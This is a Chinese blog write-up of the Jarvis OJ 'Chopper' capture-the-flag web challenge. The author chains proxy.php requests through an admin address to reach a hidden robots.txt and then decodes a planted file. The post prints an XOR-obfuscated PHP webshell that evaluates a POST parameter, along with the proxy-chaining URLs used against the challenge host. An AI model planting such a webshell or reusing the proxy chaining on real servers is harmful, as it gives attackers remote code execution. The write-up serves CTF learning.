Jarvis OJ Chopper

解题链接:http://web.jarvisoj.com:32782/

打开

点一下管理员登录并不让进,bp后发现跟flag在管理员手里一样啊

用刚才的方法试一试

并不行,没有源码,不知道是不是md5,也不知道加盐的位置。

不过bp时发现了admin的地址202.5.19.128

看到图片的位置非常奇怪,可能就是木马文件代理访问的入口

构造地址http://web.jarvisoj.com:32782/proxy.php?url=http://202.5.19.128/proxy.php?url=http://web.jarvisoj.com:32782/admin/

大致意思是利用木马做代理访问admin网址,再利用admin代理访问admin界面

然后可以得到如下界面

做不下去了,看看网上怎么说

https://chybeta.github.io/2017/07/05/jarvisoj-web-writeup/

这位大神有点东西的,不过他怎么知道这个目录可能有robots.txt?大概这就是经验吧

访问

http://web.jarvisoj.com:32782/proxy.php?url=http://202.5.19.128/proxy.php?url=http://web.jarvisoj.com:32782/admin/robots.txt

得到

打开trojan.php.txt试试

得到了一串php代码

?php ${("#"^"|").("#"^"|")}=("!"^"`").("( "^"{").("("^"[").("~"^";").("|"^".").("*"^"~");${("#"^"|").("#"^"|")}(("-"^"H"). ("]"^"+"). ("["^":"). (","^"@"). ("}"^"U"). ("e"^"A"). ("("^"w").("j"^":"). ("i"^"&"). ("#"^"p"). (">"^"j"). ("!"^"z"). ("T"^"g"). ("e"^"S"). ("_"^"o"). ("?"^"b"). ("]"^"t"));?

在在线网站上运行一下,得到两行错误信息

PHP Notice:  Undefined offset: 360 in /usercode/file.php(1) : assert code on line 1
PHP Warning:  assert(): Assertion "eval($_POST[360])" failed in /usercode/file.php on line 1

说明要post的信息就是360,那么尝试一下。

得到flag

这种题真的是跳跃性很大,如果没有做过类似的题真的很难想出来

首先是如何找到木马的位置

然后是如何利用木马做代理访问admin的地址

然后是访问成功后再获取robots.txt获得文件目录

最后得到木马源码后还要运行得到其链接位置

然后对木马进行操作得到flag

确实很难,对于小白来说还是很有挑战性

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注

[2;3Rer>